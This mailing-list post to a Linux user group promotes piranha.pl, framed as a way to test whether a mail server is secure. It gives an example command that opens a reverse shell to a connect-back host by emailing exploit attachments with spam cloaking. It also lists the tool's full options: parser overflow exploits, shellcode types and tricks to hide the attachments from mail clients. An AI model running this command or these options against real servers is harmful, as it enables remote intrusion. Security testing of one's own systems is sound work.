HackFest Series: piranha.pl (or why Spamassassin/Clamav is…

Top Page
Attachments:
Message as email
+ (text/plain)
+ (text/html)
+ (text/plain)
Delete this message
Reply to this message
Author: Lisa Kachold
Date:  
To: plug-discuss
New-Topics: Fedora 10 Preview Available Now!
Subject: HackFest Series: piranha.pl (or why Spamassassin/Clamav is a GOOD IDEA)

Is your mail server secure?

Test it!

Piranha.pl example: Connect back with a reverse shell just by sending an email using "Viagra" cloaking.


$ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a


Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]

Mandatory arguments:
  -e+           Exploit number to use (See below)
  -h+           SMTP server to test
  -a+           Destination email address used in probing


Optional arguments:
  -s+          Shellcode type to inject into exploits (See below)
  -c+          Cloaking style (See below)
  -d+          Try to vanish attachments from MUA's view (See below)
  -v            Attach EICAR virus to improve stealthness
  -z            Pack all the malware into a tarball to be less noisy
  -p+          Port to use in reverse shell or bind shell
  -l+           Host to connect back in reverse shell mode


Valid exploits numbers:
   0            OSVDB #5753:    LHA get_header File Name Overflow
   1            OSVDB #5754:    LHA get_header Directory Name Overflow
   2            OSVDB #6456:    file readelf.c tryelf() ELF Header Overflow
   3            OSVDB #11695:   unarj Filename Handling Overflow
   4            OSVDB #23460:   ZOO combine File and Dir name overflow
   5            OSVDB #15867:   Convert UUlib uunconc integer overflow
   6            OSVDB #XXX:     ZOO next offset infinite loop DoS


Valid shellcode types:
   0            TCP reverse shell
   1            UDP reverse shell
   2            TCP bind shell


Valid cloaking styles (consult whitepaper for visual result):
   0            No cloaking at all (default)
   1            Viagra spam message
   2            "Look at the pictures I promised you!"


Vanishing techniques for attachments:
   0            No vanishing at all (default)
   1            Multipart/alternative trick
   2            <img src="image.JPG" width=0 height=0> trick




Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452




_________________________________________________________________
Windows Live Hotmail now works up to 70% faster.
http://windowslive.com/Explore/Hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_faster_112008---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss